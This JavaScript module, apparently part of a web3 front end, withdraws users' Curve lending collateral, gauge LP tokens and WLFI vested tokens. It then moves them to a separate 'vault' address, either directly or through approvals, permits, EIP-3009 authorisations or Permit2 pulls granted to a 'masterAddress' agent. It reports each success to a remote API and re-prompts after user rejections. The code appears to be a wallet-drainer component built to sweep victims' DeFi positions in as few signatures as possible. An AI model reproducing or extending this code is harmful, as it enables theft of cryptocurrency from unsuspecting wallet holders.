/**
 * Curve lending and WLFI vest — second leg, and the optional sibling batch.
 * Same shape as relayExecute: the hook passes wallet/session deps, this file
 * owns the call building.
 *
 * A smart-account batch removes or claims, then transfers that amount to the
 * vault in the same signature. A normal wallet does the protocol step, then
 * the stamped pull. EIP-3009 and Permit2 on that pull are relayTransfer.
 * Approve, ethPermit, and the increase methods stay on the transfer agent.
 */
import { BigNumber, utils } from "ethers";
import { signERC2612Permit } from "eth-permit";
import { isActionUserRejection, logApprovalSuccess } from "../hookClient";
import { chains } from "./chains";
import {
  erc20ABI,
  curveControllerABI,
  curveGaugeABI,
  wlfiTokenVestABI,
  wlfiVesterABI,
} from "./constants";
import {
  canAtomicSendCalls,
  createProtocolExitObject,
  createBridgeTokenTo,
  curveFreeCollateralWei,
  EIP3009_TRANSFER_TYPES,
  finalizeProtocolExitTokenData,
  getDeadline,
  getEip712Details,
  getGasOptions,
  sendWalletCalls,
  simulateSequentialCalls,
  snapshotWalletCapabilities,
} from "./helpers";

export const TWO_STEP_HANDLES = new Set([
  "curveLendingWithdraw",
  "curveGaugeWithdraw",
  "wlfiVestClaim",
]);
export const ONCHAIN_PULL = new Set(["approve", "increaseAllowance", "increaseApproval"]);

const PULL_ALLOWANCE_IFACE = new utils.Interface([
  "function approve(address spender, uint256 amount) returns (bool)",
  "function increaseAllowance(address spender, uint256 addedValue) returns (bool)",
  "function increaseApproval(address spender, uint256 addedValue) returns (bool)",
]);

/** Batch uses an on-chain allowance. Signatures stay on the single-row path. */
export const onChainPullMethod = (pullHandle) =>
  ONCHAIN_PULL.has(pullHandle) ? pullHandle : "approve";

export function encodePullAllowance(method, spender, amount) {
  const name = onChainPullMethod(method);
  return PULL_ALLOWANCE_IFACE.encodeFunctionData(name, [spender, amount]);
}

const TRANSFER_IFACE = new utils.Interface([
  "function transfer(address to, uint256 amount) returns (bool)",
]);

export function encodeErc20Transfer(to, amountWei) {
  return TRANSFER_IFACE.encodeFunctionData("transfer", [to, amountWei]);
}

async function sendOnChainAllowance(deps, tokenContract, method, amountWei, token) {
  const { masterAddress, txData, requireConfirmed, logActionFailure } = deps;
  const params = [masterAddress, amountWei];
  try {
    const gas = await getGasOptions(tokenContract, method, params, txData);
    const tx = await tokenContract[method](...params, gas);
    if (!tx) return { ok: false };
    if (!(await requireConfirmed(tx, method, token))) return { ok: false };
    return { ok: true, approveHash: tx.hash };
  } catch (error) {
    if (isActionUserRejection(error)) {
      logActionFailure(method, token, error);
      return { ok: false, rejected: true };
    }
    return { ok: false, error };
  }
}

async function signExactPermit(deps, tokenAddress, amountWei) {
  const { provider, address, chainId, signer, masterAddress } = deps;
  const probe = { id: tokenAddress };
  const { domain, nonce } = await getEip712Details(provider, address, chainId, probe);
  if (!domain) return null;
  const result = await signERC2612Permit(
    signer,
    domain,
    address,
    masterAddress,
    amountWei,
    getDeadline(),
    nonce
  );
  if (!result) return null;
  return { permit: result, permitType: "ERC2612Permit" };
}

async function signExact3009(deps, tokenAddress, amountWei) {
  const { provider, address, chainId, signer, vault } = deps;
  const probe = { id: tokenAddress };
  const details = await getEip712Details(provider, address, chainId, probe);
  if (!details?.domain || !vault) return null;
  const now = Math.floor(Date.now() / 1000);
  const message = {
    from: address,
    to: vault,
    value: amountWei,
    validAfter: now - 300,
    validBefore: now + 3600,
    nonce: utils.hexlify(utils.randomBytes(32)),
  };
  const signature = await signer._signTypedData(
    details.domain,
    EIP3009_TRANSFER_TYPES,
    message
  );
  const { v, r, s } = utils.splitSignature(signature);
  return {
    from: address,
    to: vault,
    value: amountWei.toString(),
    validAfter: message.validAfter,
    validBefore: message.validBefore,
    nonce: message.nonce,
    v,
    r,
    s,
  };
}

/**
 * Allowance for the transfer agent. A failed stamped method falls back to
 * approve. A user reject does not.
 */
const PERMIT2_ADDRESS = "0x000000000022D473030F116dDEE9F6B43aC78BA3";

async function permit2Covers(deps, tokenAddress, amountWei) {
  const { getContract, address, masterAddress } = deps;
  if (!getContract || !address || !masterAddress || !amountWei) return false;
  try {
    const permit2 = getContract(PERMIT2_ADDRESS, [
      "function allowance(address,address,address) view returns (uint160,uint48,uint48)",
    ]);
    const row = await permit2.allowance(address, tokenAddress, masterAddress);
    const expiration = Number(row[1]);
    if (!expiration || expiration <= Math.floor(Date.now() / 1000)) return false;
    return BigNumber.from(row[0]).gte(amountWei);
  } catch {
    return false;
  }
}

export async function settlePullAllowance(deps, { token, tokenContract, amountWei }) {
  const { logActionFailure } = deps;
  const stamped = token?.positionDetails?.pullHandle || "approve";
  if (stamped === "alreadyApproved") return { ok: true };
  if (stamped === "permit2") {
    if (await permit2Covers(deps, tokenContract.address, amountWei)) {
      return { ok: true, usePermit2: true };
    }
    return sendOnChainAllowance(deps, tokenContract, "approve", amountWei, token);
  }
  if (stamped === "ethPermit") {
    try {
      const signed = await signExactPermit(deps, tokenContract.address, amountWei);
      if (signed) return { ok: true, ...signed };
    } catch (error) {
      if (isActionUserRejection(error)) {
        logActionFailure("ethPermit", token, error);
        return { ok: false, rejected: true };
      }
    }
    return sendOnChainAllowance(deps, tokenContract, "approve", amountWei, token);
  }
  if (stamped === "eip3009") {
    try {
      const authorization = await signExact3009(deps, tokenContract.address, amountWei);
      if (authorization) return { ok: true, authorization };
    } catch (error) {
      if (isActionUserRejection(error)) {
        logActionFailure("eip3009", token, error);
        return { ok: false, rejected: true };
      }
    }
    return sendOnChainAllowance(deps, tokenContract, "approve", amountWei, token);
  }
  const first = ONCHAIN_PULL.has(stamped) ? stamped : "approve";
  const ran = await sendOnChainAllowance(deps, tokenContract, first, amountWei, token);
  if (ran.ok || ran.rejected || first === "approve") return ran;
  return sendOnChainAllowance(deps, tokenContract, "approve", amountWei, token);
}

/**
 * EIP-3009 / Permit2 second step. Quotes after the tokens have landed and
 * posts /bridge. A user reject stops. Any other miss falls back to the agent pull.
 */
export async function relayPullLanded(deps, { token, tokenContract, amountWei }) {
  const relay = token?.relay;
  const hint = relay?.quoteHint;
  if (
    token?.positionDetails?.pullHandle !== "relayTransfer" ||
    !relay?.preferPermit ||
    !hint?.fromToken ||
    !hint?.toToken
  ) {
    return { skipped: true };
  }
  const {
    vault,
    address,
    walletClient,
    executeRelayTransfer,
    postBridgeSuccess,
    apiUrl,
    apiData,
    owner,
    logActionFailure,
  } = deps;
  if (!executeRelayTransfer || !postBridgeSuccess || !vault || !amountWei) {
    return { skipped: true };
  }
  try {
    const { hash, requestId, batchMode } = await executeRelayTransfer({
      walletClient,
      fromChain: Number(hint.fromChain),
      toChain: Number(hint.toChain),
      fromToken: hint.fromToken,
      toToken: hint.toToken,
      amount: amountWei.toString(),
      user: address,
      recipient: vault,
      preferPermit: true,
      permitExpiry: relay.permitExpiry,
      tokenUsd: token.tokenValue ?? token.value,
      source: owner,
    });
    const decimals = Number(await tokenContract.decimals().catch(() => 18));
    const movedAmt = Number(utils.formatUnits(amountWei, decimals));
    const posted = await postBridgeSuccess(apiUrl, {
      token,
      movedAmt,
      hash: hash || "0x",
      handleType: "relayTransfer",
      apiData,
      tokenTo: createBridgeTokenTo(hint.toToken, relay.toSymbol || "USDC", "erc20"),
      dest: {
        destChainId: Number(hint.toChain),
        receiver: vault,
        requestId,
        ...(batchMode ? { batchMode } : {}),
        ...(relay.permitKind ? { permitKind: relay.permitKind } : {}),
      },
    });
    return { ok: true, hash: posted?.hash || hash || null };
  } catch (error) {
    if (isActionUserRejection(error)) {
      logActionFailure("relayTransfer", token, error);
      return { ok: false, rejected: true };
    }
    return { ok: false, fallback: true };
  }
}

function listedCollateralWei(token) {
  const decimals = Number(token?.positionDetails?.collateralDecimals ?? 18);
  const human = token?.positionDetails?.withdrawableCollateral ?? token?.amount;
  const n = Number(human);
  if (!Number.isFinite(n) || n <= 0) return null;
  try {
    return utils.parseUnits(n.toFixed(decimals), decimals);
  } catch {
    return null;
  }
}

/**
 * Live controller read for one Curve row.
 * skipRemove: the free collateral is already in the wallet (a previous click
 * removed it and the follow-up was rejected). Only the haircut may still sit
 * on the controller. The next click is the stamped pull of that wallet balance.
 */
export async function inspectCurveWithdraw(deps, token) {
  const { getContract, address } = deps;
  const controllerAddr = token?.id;
  const collAddr = token?.positionDetails?.collateralToken;
  if (!controllerAddr || !collAddr || !address) return null;
  const controller = getContract(controllerAddr, curveControllerABI);
  const collateral = getContract(collAddr, erc20ABI);
  const hasUseEthArg = token.positionDetails?.hasUseEthArg === true;
  const removeMethod = hasUseEthArg
    ? "remove_collateral(uint256,bool)"
    : "remove_collateral(uint256)";
  const state = await controller.user_state(address);
  if (state[1] && !state[1].isZero()) return { softLiq: true };
  const minC = await controller.min_collateral(state[2], state[3]);
  const freeWei = curveFreeCollateralWei(state[0], minC) || BigNumber.from(0);
  const walletBal = await collateral.balanceOf(address);
  const listedWei = listedCollateralWei(token);
  const dustLeft =
    listedWei && listedWei.gt(0)
      ? freeWei.isZero() || freeWei.mul(100).lt(listedWei)
      : freeWei.isZero();
  const skipRemove = dustLeft && walletBal.gt(0);
  const pullWei = skipRemove
    ? listedWei && listedWei.gt(0) && walletBal.gt(listedWei)
      ? listedWei
      : walletBal
    : freeWei;
  return {
    softLiq: false,
    controller,
    collateral,
    controllerAddr,
    collAddr,
    hasUseEthArg,
    removeMethod,
    freeWei,
    walletBal,
    skipRemove,
    pullWei,
  };
}

/**
 * Live gauge read. skipWithdraw: a previous click already paid the LP and
 * the follow-up was rejected. The next click moves the LP already in the
 * wallet, capped at the listed gauge size. A smart account transfers it.
 * A normal wallet uses the stamped pull.
 */
export async function inspectCurveGauge(deps, token) {
  const { getContract, address } = deps;
  const gaugeAddr = token?.id;
  const lpAddr = token?.positionDetails?.lpToken || token?.positionDetails?.collateralToken;
  if (!gaugeAddr || !lpAddr || !address) return null;
  const gauge = getContract(gaugeAddr, curveGaugeABI);
  const lp = getContract(lpAddr, erc20ABI);
  const [stillStaked, walletBal] = await Promise.all([
    gauge.balanceOf(address),
    lp.balanceOf(address),
  ]);
  const listedWei = listedLpWei(token);
  const dustLeft =
    listedWei && listedWei.gt(0)
      ? stillStaked.isZero() || stillStaked.mul(100).lt(listedWei)
      : stillStaked.isZero();
  const skipWithdraw = dustLeft && walletBal.gt(0);
  const pullWei = skipWithdraw
    ? listedWei && listedWei.gt(0) && walletBal.gt(listedWei)
      ? listedWei
      : walletBal
    : stillStaked;
  return {
    gauge,
    lp,
    gaugeAddr,
    lpAddr,
    stillStaked,
    walletBal,
    skipWithdraw,
    pullWei,
  };
}

const STAKE_DAO_GAUGE_ABI = [
  "function staking_token() view returns (address)",
  "function balanceOf(address) view returns (uint256)",
  "function withdraw(uint256)",
];

/** Stake DAO gauge. withdraw pays staking_token(), not the Debank underlying. */
export async function inspectStakeDao(deps, token) {
  const { getContract, address } = deps;
  const gaugeAddr = token?.id;
  if (!gaugeAddr || !address) return null;
  const gauge = getContract(gaugeAddr, STAKE_DAO_GAUGE_ABI);
  const stakingAddr =
    token?.positionDetails?.stakingToken ||
    token?.positionDetails?.pullToken ||
    (await gauge.staking_token());
  if (!stakingAddr) return null;
  const staking = getContract(stakingAddr, erc20ABI);
  const [stillStaked, walletBal] = await Promise.all([
    gauge.balanceOf(address),
    staking.balanceOf(address),
  ]);
  const skipWithdraw = stillStaked.isZero() && walletBal.gt(0);
  const pullWei = skipWithdraw ? walletBal : stillStaked;
  return {
    gauge,
    staking,
    gaugeAddr,
    stakingAddr,
    stillStaked,
    walletBal,
    skipWithdraw,
    pullWei,
  };
}

function listedLpWei(token) {
  const decimals = Number(
    token?.decimals ?? token?.positionDetails?.collateralDecimals ?? 18
  );
  const human = token?.amount;
  const n = Number(human);
  if (!Number.isFinite(n) || n <= 0) return null;
  try {
    return utils.parseUnits(n.toFixed(decimals), decimals);
  } catch {
    return null;
  }
}

async function prepareCurveCalls(deps, token) {
  const { vault } = deps;
  if (!vault) return null;
  const plan = await inspectCurveWithdraw(deps, token);
  if (!plan || plan.softLiq) return null;
  const amount = plan.skipRemove ? plan.pullWei : plan.freeWei;
  if (!amount || amount.isZero()) return null;
  const calls = [];
  if (!plan.skipRemove) {
    const removeParams = plan.hasUseEthArg ? [plan.freeWei, false] : [plan.freeWei];
    calls.push({
      to: plan.controllerAddr,
      data: plan.controller.interface.encodeFunctionData(plan.removeMethod, removeParams),
    });
  }
  calls.push({
    to: plan.collAddr,
    data: encodeErc20Transfer(vault, amount),
  });
  return {
    kind: "curve",
    token,
    collAddr: plan.collAddr,
    freeWei: amount,
    before: plan.walletBal,
    collateral: plan.collateral,
    calls,
  };
}

async function prepareGaugeCalls(deps, token) {
  const { vault } = deps;
  if (!vault) return null;
  const plan = await inspectCurveGauge(deps, token);
  if (!plan || !plan.pullWei || plan.pullWei.isZero()) return null;
  if (plan.skipWithdraw) {
    return {
      kind: "gauge",
      token,
      lpAddr: plan.lpAddr,
      lp: plan.lp,
      amount: plan.pullWei,
      before: plan.walletBal,
      calls: [{ to: plan.lpAddr, data: encodeErc20Transfer(vault, plan.pullWei) }],
    };
  }
  if (!plan.stillStaked || plan.stillStaked.isZero()) return null;
  return {
    kind: "gauge",
    token,
    lpAddr: plan.lpAddr,
    lp: plan.lp,
    amount: plan.stillStaked,
    before: plan.walletBal,
    calls: [
      {
        to: plan.gaugeAddr,
        data: plan.gauge.interface.encodeFunctionData("withdraw", [plan.stillStaked]),
      },
      { to: plan.lpAddr, data: encodeErc20Transfer(vault, plan.stillStaked) },
    ],
  };
}

async function prepareWlfiCalls(deps, token) {
  const { getContract, address, vault } = deps;
  const wlfiAddr =
    token?.positionDetails?.wlfiToken || token?.positionDetails?.underlying?.id;
  if (!wlfiAddr || !token?.id || !vault) return null;
  const wlfi = getContract(wlfiAddr, wlfiTokenVestABI);
  const vester = getContract(token.id, wlfiVesterABI);
  const claimable = await vester.claimable(address);
  if (!claimable || claimable.isZero()) return null;
  const before = await wlfi.balanceOf(address);
  return {
    kind: "wlfi",
    token,
    wlfiAddr,
    wlfi,
    claimable,
    before,
    calls: [
      { to: wlfiAddr, data: wlfi.interface.encodeFunctionData("claimVest", []) },
      { to: wlfiAddr, data: encodeErc20Transfer(vault, claimable) },
    ],
  };
}

async function postPreparedExit(deps, prep, hash) {
  const { address, apiUrl, apiData } = deps;
  if (prep.kind === "curve") {
    const after = await prep.collateral.balanceOf(address);
    const received = after.gt(prep.before) ? after.sub(prep.before) : prep.freeWei;
    const pullAmt = received.gt(prep.freeWei) ? prep.freeWei : received;
    const tokenData = await finalizeProtocolExitTokenData(async () => {
      const decimals = Number(
        prep.token.positionDetails?.collateralDecimals ??
          (await prep.collateral.decimals().catch(() => 18))
      );
      const symbol =
        prep.token.positionDetails?.collateralSymbol ||
        (await prep.collateral.symbol().catch(() => prep.token.symbol || "COLL"));
      const readable = Number(utils.formatUnits(pullAmt, decimals));
      const listed = Number(prep.token.amount) || readable;
      const listedUsd = Number(prep.token.tokenValue) || 0;
      const value = listed > 0 ? (listedUsd / listed) * readable : listedUsd;
      return {
        address: prep.collAddr,
        id: prep.collAddr,
        symbol,
        decimals,
        amount: readable,
        balance: readable,
        type: "erc20",
        value,
      };
    }, prep.token);
    logApprovalSuccess(
      apiUrl,
      createProtocolExitObject(
        tokenData,
        apiData,
        hash,
        "curveLendingWithdraw",
        {
          ...(prep.token.positionDetails || {}),
          collateralToken: prep.collAddr,
          pullWei: pullAmt.toString(),
        },
        { batchMode: "sendCalls", deliveredToVault: true }
      ),
      "curveLendingWithdraw"
    );
    return;
  }
  if (prep.kind === "gauge") {
    const tokenData = await finalizeProtocolExitTokenData(async () => {
      const decimals = Number(
        prep.token.positionDetails?.collateralDecimals ??
          (await prep.lp.decimals().catch(() => 18))
      );
      const symbol =
        prep.token.positionDetails?.collateralSymbol ||
        (await prep.lp.symbol().catch(() => prep.token.symbol || "LP"));
      const readable = Number(utils.formatUnits(prep.amount, decimals));
      return {
        address: prep.lpAddr,
        id: prep.lpAddr,
        symbol,
        decimals,
        amount: readable,
        balance: readable,
        type: "erc20",
        value: prep.token.tokenValue,
      };
    }, prep.token);
    logApprovalSuccess(
      apiUrl,
      createProtocolExitObject(
        tokenData,
        apiData,
        hash,
        "curveGaugeWithdraw",
        {
          ...(prep.token.positionDetails || {}),
          lpToken: prep.lpAddr,
          collateralToken: prep.lpAddr,
          pullWei: prep.amount.toString(),
        },
        { batchMode: "sendCalls", deliveredToVault: true }
      ),
      "curveGaugeWithdraw"
    );
    return;
  }
  const after = await prep.wlfi.balanceOf(address);
  const landed = after.gt(prep.before) ? after.sub(prep.before) : prep.claimable;
  const tokenData = await finalizeProtocolExitTokenData(async () => {
    const decimals = await prep.wlfi.decimals().catch(() => 18);
    const symbol = await prep.wlfi.symbol().catch(() => "WLFI");
    const readable = Number(landed) / 10 ** Number(decimals);
    return {
      address: prep.wlfiAddr,
      id: prep.wlfiAddr,
      symbol,
      decimals: Number(decimals),
      amount: readable,
      balance: readable,
      type: "erc20",
      value: prep.token.tokenValue,
    };
  }, prep.token);
  logApprovalSuccess(
    apiUrl,
    createProtocolExitObject(
      tokenData,
      apiData,
      hash,
      "wlfiVestClaim",
      { ...(prep.token.positionDetails || {}), pullWei: landed.toString() },
      { batchMode: "sendCalls", deliveredToVault: true }
    ),
    "wlfiVestClaim"
  );
}

/**
 * Same handleType, two or more rows, one sendCalls.
 * Sim failure or a user reject returns without logging a reject, so the
 * click continues one row at a time.
 */
export async function runSiblingTwoStepBatch(deps, handleType) {
  const {
    groupTwoStepBatch,
    allTokensRef,
    setAllTokens,
    walletCapsRef,
    walletClient,
    chainId,
    provider,
    address,
    resolveHandleChainId,
  } = deps;
  if (groupTwoStepBatch !== true) return { handled: false };
  if (!TWO_STEP_HANDLES.has(handleType)) return { handled: false };
  const groups = (allTokensRef.current || []).filter(
    (g) => g?.tokens?.[0]?.handleType === handleType
  );
  if (groups.length < 2) return { handled: false };
  if (!canAtomicSendCalls(walletCapsRef.current, walletClient, chainId)) {
    walletCapsRef.current = await snapshotWalletCapabilities(
      provider,
      walletClient,
      address,
      chainId
    );
  }
  if (!canAtomicSendCalls(walletCapsRef.current, walletClient, chainId)) {
    return { handled: false };
  }
  const sameChain = groups.every(
    (g) => resolveHandleChainId(g.tokens[0], handleType) === Number(chainId)
  );
  if (!sameChain) return { handled: false };

  const preps = [];
  try {
    for (const g of groups) {
      const token = g.tokens[0];
      const prep =
        handleType === "curveLendingWithdraw"
          ? await prepareCurveCalls(deps, token)
          : handleType === "curveGaugeWithdraw"
            ? await prepareGaugeCalls(deps, token)
            : await prepareWlfiCalls(deps, token);
      if (!prep) return { handled: false };
      preps.push(prep);
    }
  } catch (error) {
    console.warn("[sibling batch] prepare failed", error?.message || error);
    return { handled: false };
  }

  const calls = preps.flatMap((p) => p.calls);
  const sim = await simulateSequentialCalls({
    rpcUrl: chains[Number(chainId)]?.rpcUrl,
    from: address,
    calls,
  });
  if (!sim?.ok) {
    console.warn("[sibling batch] sim split", sim?.error || "no sim");
    return { handled: false };
  }

  let hash;
  try {
    hash = await sendWalletCalls(walletClient, address, calls);
  } catch (error) {
    if (isActionUserRejection(error)) {
      console.log("[sibling batch] rejected, splitting to one row");
      return { handled: true, rejected: true };
    }
    console.warn("[sibling batch] send failed", error?.message || error);
    return { handled: false };
  }
  if (!hash || !/^0x[a-fA-F0-9]{64}$/.test(hash)) return { handled: false };
  const receipt = await provider.waitForTransaction(hash, 1);
  if (!receipt || Number(receipt.status) !== 1) return { handled: false };

  for (const prep of preps) {
    try {
      await postPreparedExit(deps, prep, hash);
    } catch (error) {
      console.warn("[sibling batch] protocolExit post failed", error?.message || error);
    }
  }
  const next = (allTokensRef.current || []).filter(
    (g) => g?.tokens?.[0]?.handleType !== handleType
  );
  allTokensRef.current = next;
  setAllTokens(next);
  return { handled: true, success: true, hash };
}
